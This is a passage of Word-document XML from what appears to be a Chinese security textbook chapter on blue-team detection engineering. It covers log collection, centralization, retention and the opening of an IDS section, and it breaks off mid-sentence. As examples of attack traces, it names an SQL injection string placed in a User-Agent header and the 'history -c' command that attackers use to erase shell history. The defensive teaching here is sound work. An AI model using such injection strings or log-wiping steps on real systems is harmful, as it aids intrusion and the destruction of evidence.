        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">微软官方安全文档（docs.microsoft.com/en-us/windows/security），尤其是关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全基线、高级审计策略配置和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysinternals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具集的部分，为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境下的持久化检测提供了第一手操作指南。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="324"/>
    <w:bookmarkEnd w:id="325"/>
    <w:bookmarkEnd w:id="326"/>
    <w:bookmarkStart w:id="405" w:name="卷五-防御专题与综合第-1922-章"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷五</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御、专题与综合（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19–22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="328" w:name="蓝队与检测工程"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队与检测工程</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="327" w:name="日志idsips-与检测规则"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志、IDS/IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与检测规则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的所有日志采集、入侵检测系统部署、网络流量分析与规则编写操作，仅限于读者自建的隔离实验环境、官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub、Hack The Box、TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的授权实例）或持有书面授权的测试目标。实验网络必须与生产环境及公共互联网物理或逻辑隔离。未经授权截获、分析或篡改他人网络流量及系统日志，违反《中华人民共和国网络安全法》《刑法》及相关国际法律。任何在未授权系统上部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS、抓取数据包或重放攻击载荷的行为均属违法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者进入系统必留痕迹——一次端口扫描会在防火墙日志里刻下成百上千条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入尝试会安静地躺在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">里，一个反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必然在网络层产生与正常业务流模式迥异的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话。蓝队检测工程的核心命题由此浮现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志与流量是攻击者无法回避的“数字犯罪现场”，检测就是把现场遗留的血迹、指纹和撬痕转化为具有可操作性的告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从第一性原理出发，攻击的本质是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对系统正常运行假设的违反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（详参</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的攻击面与威胁模型）。正常的浏览器不会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段里夹带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；正常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端不会向同一个域名服务器瞬间发出数千条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录查询；正常的内部主机不会在午夜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">点拨出到境外陌生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口连接。检测规则——无论是日志中的正则表达式还是网络入侵检测系统中的签名——正是在数学上刻画“正常”的补集，并在该补集中寻找高概率的攻击特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将这一抽象命题工程化为可运维的系统，需要解决三个逐级递进的问题：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据的采集与集中化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（日志工程）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">从数据到告警的判定逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（签名与异常检测）、以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警的准确性与可行动性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（误报/漏报权衡）。这三个问题构成本节的主干。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="327"/>
    <w:bookmarkEnd w:id="328"/>
    <w:bookmarkStart w:id="329" w:name="日志工程采集集中与留存"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志工程：采集、集中与留存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在被攻击后才想起“这个日志好像没开”是蓝队最绝望的时刻。日志工程的目标是在攻击发生之前，将全网的“数字记忆”系统地收集并保护起来，使其面临入侵者清理痕迹的压力时仍可作为法庭证据与检测数据源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">采集层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需覆盖三个维度：主机日志、网络日志与应用日志。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">syslog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">journald</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录的认证事件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，记录所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试）、系统调用审计（auditd，记录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等关键调用）、命令历史（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.bash_history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，极易被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">history -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">清除）。Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侧对应安全事件日志（Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID 4624 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录成功、4625</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录失败、4688</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程创建、5156</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤平台连接事件）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：NetFlow/IPFIX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流记录（五元组</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节数/包数，不存载荷）、防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拒绝日志、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询日志、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">租约记录。NetFlow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">轻量、隐私友好，能回答“谁在何时与谁通信”而不触碰载荷，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bejtlich </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》中反复强调的关键数据源。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器访问/错误日志（Apache/Nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log，记录每个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求的方法、URI、状态码和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent）、数据库审计日志（MySQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> general log / PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pgAudit）、邮件服务器日志等。（日志路径与格式因发行版和版本而异）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">集中化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是日志工程的第一个工程难题。攻击者拿下单台主机后的第一反应是清除本地日志，因此必须将日志实时或准实时地推送至一个受严格保护、攻击者不可达的集中存储节点（日志服务器/SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台）。常用技术栈包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syslog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议（UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 514 / TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">601，UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">丢包风险大，生产推荐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP+TLS，对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syslog-ng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rsyslog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密传输配置）、Elastic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack（Filebeat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">采集</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Logstash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Elasticsearch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">索引</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Kibana </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可视化和告警），以及云原生方案（AWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CloudWatch Logs、Azure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor）。（具体软件栈选型因运维规模和合规要求而异）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">留存策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接决定检测窗口和取证能力。留存时间越长，发现慢速</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">APT（高级持续性威胁）的概率越高，但存储成本亦线性增长。实践中需根据合规要求（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PCI DSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求一年日志留存）和可用存储空间设计热-温-冷分层存储策略：热存储（SSD，7–14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">天）用于实时告警和频繁查询；温存储（HDD，3–6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个月）用于日常回溯；冷存储（对象存储/磁带，1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">年以上）用于合规和罕见的历史取证。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="329"/>
    <w:bookmarkStart w:id="330" w:name="入侵检测系统签名检测与异常检测的双轨机理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">入侵检测系统：签名检测与异常检测的双轨机理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按部署位置分为基于网络的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
